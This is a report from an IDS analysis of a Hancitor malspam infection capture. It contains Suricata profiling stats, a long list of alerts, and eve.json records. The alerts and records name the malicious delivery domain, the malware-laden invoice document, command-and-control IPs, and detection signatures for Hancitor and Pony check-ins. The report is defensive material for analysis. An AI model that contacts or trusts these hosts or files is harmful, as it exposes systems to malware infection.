Filename: 2018-09-04-Hancitor-malspam-infection-traffic.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 23.8566420078 seconds
Hash: 90a60290858e08e0e9d5f7a4d55e5dab
Uploaded: 1548677939

Logfiles


packet_stats.log - (12917 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          5957           644250     1389669025     827244605       4927.9b   99.69
 IPv4      17            24         15634303     1356650946     643017642         15.4b    0.31
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          5957            66282       20477493        260195          1.5b   95.39
TMM_FLOWWORKER              IPv4      17            24           243459        9865210        843040         20.2m    1.25
TMM_RECEIVEPCAPFILE         IPv4       6          5791             2528       13709086          6480         37.5m    2.31
TMM_RECEIVEPCAPFILE         IPv4      17            24             2567          11321          3133         75.2k    0.00
TMM_DECODEPCAPFILE          IPv4       6          5791             2645          89048          2929         17.0m    1.04
TMM_DECODEPCAPFILE          IPv4      17            24             2807          17269          3950         94.8k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          5791             2802         104159          3436         19.9m  1.41  
flow                    IPv4      17            24             3094          19889          4609        110.6k  0.01  
stream                  IPv4       6          5957             2816         635619         12917         77.0m  5.44  
app-layer               IPv4      17            24             9089          54032         20435        490.5k  0.03  
detect                  IPv4       6          5957            44193       20281432        216508          1.3b  91.19 
detect                  IPv4      17            24           217451         544547        364236          8.7m  0.62  
tcp-prune               IPv4       6          5957             2538          85481          3082         18.4m  1.30  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            67             3196          77995         22766          1.5m  45.13 
tls                     IPv4       6           328             2630         625853          5082          1.7m  49.32 
dns                     IPv4      17            24             3358          21145          7806        187.3k  5.54  
Proto detect            IPv4      17            24             6325          34252         11684        280.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            67            31786         114434         47357          3.2m  7.25  
LOGGER_UNIFIED2             IPv4       6            67            23168         179072         48027          3.2m  7.35  
LOGGER_JSON_ALERT           IPv4       6            67            50169         150061         67800          4.5m  10.38 
LOGGER_JSON_DNS             IPv4      17            22            33762        9213338        474368         10.4m  23.85 
LOGGER_JSON_HTTP            IPv4       6            66            36110         187224         55182          3.6m  8.32  
LOGGER_JSON_TLS             IPv4       6           164            32764         162618         57186          9.4m  21.43 
LOGGER_JSON_FILE            IPv4       6           127            46780         197021         73764          9.4m  21.41 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          1982             2553         154730         25495        50.5m  26.70 
payload                           IPv4      17            24             4748          56889         27336       656.1k  0.35  
stream                            IPv4       6          1982             2514         440165         26205        51.9m  27.45 
http_uri                          IPv4       6            66             4329          36840         12833       847.0k  0.45  
http_request_line                 IPv4       6            66             4170          27182          6482       427.9k  0.23  
http_client_body                  IPv4       6            68             2919          98866         29888         2.0m  1.07  
http_header (request)             IPv4       6            66            30509         129251         68333         4.5m  2.38  
http_header (request trailer)     IPv4       6            66             2594           3522          2747       181.3k  0.10  
http_header_names (request)       IPv4       6            66            10092        7558346        135138         8.9m  4.71  
http_accept (request)             IPv4       6            66             3113           8557          3837       253.3k  0.13  
http_referer (request)            IPv4       6            66             2904          24901          3678       242.8k  0.13  
http_content_len (request)        IPv4       6            66             3511          33959          6219       410.5k  0.22  
http_content_type (request)       IPv4       6            66             3006          24807          8412       555.2k  0.29  
http_protocol (request)           IPv4       6            66             3425           7265          4933       325.6k  0.17  
http_start (request)              IPv4       6            66             8578          32724         14879       982.1k  0.52  
http_raw_header (request)         IPv4       6            68             6966          36611         14316       973.5k  0.51  
http_method                       IPv4       6            66             3866          70689          6596       435.4k  0.23  
http_cookie (request)             IPv4       6            66             2984           4881          3478       229.6k  0.12  
http_raw_uri                      IPv4       6            66             3010          33310          6349       419.1k  0.22  
http_user_agent                   IPv4       6            66            12726          52449         25256         1.7m  0.88  
http_host                         IPv4       6            66             4664          31607          7431       490.5k  0.26  
dns_query                         IPv4      17            11             8279          12729         10218       112.4k  0.06  
tls_sni                           IPv4       6           165             3341          20443          4539       749.0k  0.40  
http_response_line                IPv4       6            66             3312          52557          9196       607.0k  0.32  
http_header (response)            IPv4       6            66            10968          63893         29368         1.9m  1.02  
http_header (response trailer)    IPv4       6            66             2562           6063          4600       303.6k  0.16  
http_content_type (response)      IPv4       6            66             3314          65861          8082       533.5k  0.28  
http_raw_header (response)        IPv4       6           383             3614          25179          5116         2.0m  1.04  
http_cookie (response)            IPv4       6            66             2853          42589          4066       268.4k  0.14  
http_stat_code                    IPv4       6            66             2941          18104          4143       273.4k  0.14  
tls_cert_issuer                   IPv4       6           164             3308          65313          4921       807.1k  0.43  
tls_cert_subject                  IPv4       6           164             4315          70336          8264         1.4m  0.72  
tls_cert_serial                   IPv4       6           164             2982          24770          4033       661.4k  0.35  
file_data (http response)         IPv4       6           317             2576        8083094        166071        52.6m  27.82 
Total                             IPv4                  6944                                         27252       189.2m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           460             4412         160171         29845         13.7m  0.88  
PROF_DETECT_IPONLY          IPv4      17            22            36896          83653         46653          1.0m  0.07  
PROF_DETECT_RULES           IPv4       6          5957             2519        7629872        108126        644.1m  41.13 
PROF_DETECT_RULES           IPv4      17            24           140217         283472        200375          4.8m  0.31  
PROF_DETECT_STATEFUL_START    IPv4       6           719             5104        6237584        231649        166.6m  10.64 
PROF_DETECT_STATEFUL_CONT    IPv4       6          5957             2505         171565         10357         61.7m  3.94  
PROF_DETECT_STATEFUL_CONT    IPv4      17            24             5772          46779          8468        203.2k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          5037             2538          60039          2857         14.4m  0.92  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            24             2672           3404          2924         70.2k  0.00  
PROF_DETECT_PREFILTER       IPv4       6          5957             7689        8158471         54233        323.1m  20.63 
PROF_DETECT_PREFILTER       IPv4      17            24            31728         107942         62306          1.5m  0.10  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1982            16844         528535         60245        119.4m  7.62  
PROF_DETECT_PF_PAYLOAD      IPv4      17            24             9938          62783         32635        783.2k  0.05  
PROF_DETECT_PF_TX           IPv4       6          5037             2549        8097391         21930        110.5m  7.05  
PROF_DETECT_PF_TX           IPv4      17            12             2613          18840         15062        180.8k  0.01  
PROF_DETECT_PF_SORT1        IPv4       6          1879             2523          85585          4112          7.7m  0.49  
PROF_DETECT_PF_SORT1        IPv4      17            24             3374          59383          6332        152.0k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6          5957             2509          68388          3019         18.0m  1.15  
PROF_DETECT_PF_SORT2        IPv4      17            24             2766           4684          3426         82.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          5957             2522          85384          3083         18.4m  1.17  
PROF_DETECT_NONMPMLIST      IPv4      17            24             2835           4105          3204         76.9k  0.00  
PROF_DETECT_ALERT           IPv4       6          5957             2510          64490          2825         16.8m  1.07  
PROF_DETECT_ALERT           IPv4      17            24             2525           9952          3054         73.3k  0.00  
PROF_DETECT_CLEANUP         IPv4       6          5957             2543        4742445          3833         22.8m  1.46  
PROF_DETECT_CLEANUP         IPv4      17            24             2547           5278          3439         82.5k  0.01  
PROF_DETECT_GETSGH          IPv4       6          5957             2514          69321          3306         19.7m  1.26  
PROF_DETECT_GETSGH          IPv4      17            24             2787           6894          5967        143.2k  0.01  


suricata-4.0.0-etpro-all-alert-2019-01-28-T-12-19-23-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (13625 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
09/04/2018-15:47:45.738863  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 95.213.235.149:80 -> 10.9.4.102:49165
09/04/2018-15:47:45.825885  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 95.213.235.149:80 -> 10.9.4.102:49165
09/04/2018-15:50:12.796998  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.9.4.102:49173 -> 54.243.179.137:80
09/04/2018-15:50:14.397704  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49174 -> 185.66.9.184:80
09/04/2018-15:50:14.854139  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 184.95.44.218:80 -> 10.9.4.102:49175
09/04/2018-15:50:21.605555  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49176 -> 185.66.9.184:80
09/04/2018-15:50:22.737948  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 184.95.44.218:80 -> 10.9.4.102:49177
09/04/2018-15:50:22.992232  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49179 -> 185.66.9.184:80
09/04/2018-15:50:23.145020  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 184.95.44.218:80 -> 10.9.4.102:49178
09/04/2018-15:52:23.955577  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49180 -> 185.66.9.184:80
09/04/2018-15:54:24.622718  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49186 -> 185.66.9.184:80
09/04/2018-15:56:25.184332  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49187 -> 185.66.9.184:80
09/04/2018-15:58:25.834656  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49193 -> 185.66.9.184:80
09/04/2018-16:00:26.546628  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49194 -> 185.66.9.184:80
09/04/2018-16:02:27.047093  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49199 -> 185.66.9.184:80
09/04/2018-16:04:27.609204  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49204 -> 185.66.9.184:80
09/04/2018-16:06:28.140128  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49205 -> 185.66.9.184:80
09/04/2018-16:08:28.737082  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49210 -> 185.66.9.184:80
09/04/2018-16:10:29.253511  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49211 -> 185.66.9.184:80
09/04/2018-16:12:29.840240  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49214 -> 185.66.9.184:80
09/04/2018-16:14:30.442493  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49219 -> 185.66.9.184:80
09/04/2018-16:16:30.940730  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49220 -> 185.66.9.184:80
09/04/2018-16:18:31.477162  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49225 -> 185.66.9.184:80
09/04/2018-16:20:32.164802  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49226 -> 185.66.9.184:80
09/04/2018-16:22:32.636527  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49235 -> 185.66.9.184:80
09/04/2018-16:24:33.361949  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49242 -> 185.66.9.184:80
09/04/2018-16:26:34.004149  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49251 -> 185.66.9.184:80
09/04/2018-16:28:34.809712  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49256 -> 185.66.9.184:80
09/04/2018-16:30:35.253105  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49257 -> 185.66.9.184:80
09/04/2018-16:32:35.684000  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49260 -> 185.66.9.184:80
09/04/2018-16:34:36.524360  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49265 -> 185.66.9.184:80
09/04/2018-16:36:37.183254  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49266 -> 185.66.9.184:80
09/04/2018-16:38:37.704574  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49271 -> 185.66.9.184:80
09/04/2018-16:40:38.408768  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49272 -> 185.66.9.184:80
09/04/2018-16:42:38.952076  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49275 -> 185.66.9.184:80
09/04/2018-16:44:39.517095  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49280 -> 185.66.9.184:80
09/04/2018-16:46:40.107355  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49281 -> 185.66.9.184:80
09/04/2018-16:48:40.625098  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49286 -> 185.66.9.184:80
09/04/2018-16:50:41.377171  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49287 -> 185.66.9.184:80
09/04/2018-16:52:41.924520  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49290 -> 185.66.9.184:80
09/04/2018-16:54:42.432160  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49295 -> 185.66.9.184:80
09/04/2018-16:56:43.021799  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49312 -> 185.66.9.184:80
09/04/2018-16:58:43.589303  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49313 -> 185.66.9.184:80
09/04/2018-17:00:44.320140  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49318 -> 185.66.9.184:80
09/04/2018-17:02:44.817670  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49321 -> 185.66.9.184:80
09/04/2018-17:04:45.543432  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49326 -> 185.66.9.184:80
09/04/2018-17:06:46.141769  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49327 -> 185.66.9.184:80
09/04/2018-17:08:46.835833  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49328 -> 185.66.9.184:80
09/04/2018-17:10:47.343968  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49333 -> 185.66.9.184:80
09/04/2018-17:12:47.850511  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49336 -> 185.66.9.184:80
09/04/2018-17:14:48.440386  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49341 -> 185.66.9.184:80
09/04/2018-17:16:48.937063  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49342 -> 185.66.9.184:80
09/04/2018-17:18:49.460066  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49343 -> 185.66.9.184:80
09/04/2018-17:20:49.990761  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49348 -> 185.66.9.184:80
09/04/2018-17:22:50.566275  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49351 -> 185.66.9.184:80
09/04/2018-17:24:51.068489  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49356 -> 185.66.9.184:80
09/04/2018-17:26:51.574119  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49373 -> 185.66.9.184:80
09/04/2018-17:28:52.225648  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49374 -> 185.66.9.184:80
09/04/2018-17:30:52.961995  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49379 -> 185.66.9.184:80
09/04/2018-17:32:53.469698  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49382 -> 185.66.9.184:80
09/04/2018-17:34:54.156075  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49387 -> 185.66.9.184:80
09/04/2018-17:36:54.751984  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49388 -> 185.66.9.184:80
09/04/2018-17:38:55.322565  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49389 -> 185.66.9.184:80
09/04/2018-17:40:55.859369  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49394 -> 185.66.9.184:80
09/04/2018-17:42:56.424881  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49398 -> 185.66.9.184:80
09/04/2018-17:44:57.175397  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49403 -> 185.66.9.184:80
09/04/2018-17:46:57.789382  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.9.4.102:49404 -> 185.66.9.184:80


stats.log - (3164 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
------------------------------------------------------------------------------------
Date: 1/28/2019 -- 12:19:23 (uptime: 0d, 00h 00m 03s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 5815
decoder.bytes                              | Total                     | 2853064
decoder.ipv4                               | Total                     | 5815
decoder.ethernet                           | Total                     | 5815
decoder.tcp                                | Total                     | 5791
decoder.udp                                | Total                     | 24
decoder.avg_pkt_size                       | Total                     | 490
decoder.max_pkt_size                       | Total                     | 5158
flow.tcp                                   | Total                     | 230
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 230
tcp.syn                                    | Total                     | 230
tcp.synack                                 | Total                     | 230
detect.alert                               | Total                     | 67
detect.mpm_list                            | Total                     | 4
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 4
app_layer.flow.http                        | Total                     | 66
app_layer.tx.http                          | Total                     | 66
app_layer.flow.tls                         | Total                     | 164
app_layer.flow.dns_udp                     | Total                     | 11
app_layer.tx.dns_udp                       | Total                     | 11
flow_mgr.closed_pruned                     | Total                     | 64
flow_mgr.est_pruned                        | Total                     | 11
flow.spare                                 | Total                     | 10074
flow_mgr.flows_checked                     | Total                     | 240
flow_mgr.flows_notimeout                   | Total                     | 2
flow_mgr.flows_timeout                     | Total                     | 238
flow_mgr.flows_timeout_inuse               | Total                     | 164
flow_mgr.flows_removed                     | Total                     | 74
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65296
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7143424


eve.json - (193147 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
{"timestamp":"2018-09-04T15:47:38.531268+0000","flow_id":531694018501444,"pcap_cnt":1,"event_type":"dns","src_ip":"10.9.4.102","src_port":56774,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11522,"rrname":"resolutesearch.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:47:39.025962+0000","flow_id":531694018501444,"pcap_cnt":2,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":56774,"proto":"UDP","dns":{"type":"answer","id":11522,"rcode":"NOERROR","rrname":"resolutesearch.com","rrtype":"A","ttl":5,"rdata":"95.213.235.149"}}
{"timestamp":"2018-09-04T15:47:45.738863+0000","flow_id":1062466077352284,"pcap_cnt":202,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:47:45.825885+0000","flow_id":1062466077352284,"pcap_cnt":209,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-09-04T15:47:45.966335+0000","flow_id":1062466077352284,"pcap_cnt":235,"event_type":"http","src_ip":"10.9.4.102","src_port":49165,"dest_ip":"95.213.235.149","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-09-04T15:48:02.158841+0000","flow_id":1062466077352284,"pcap_cnt":236,"event_type":"fileinfo","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"proto":"TCP","http":{"hostname":"resolutesearch.com","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":212992},"app_proto":"http","fileinfo":{"filename":"invoice_149027.doc","gaps":false,"state":"CLOSED","stored":false,"size":212992,"tx_id":0}}
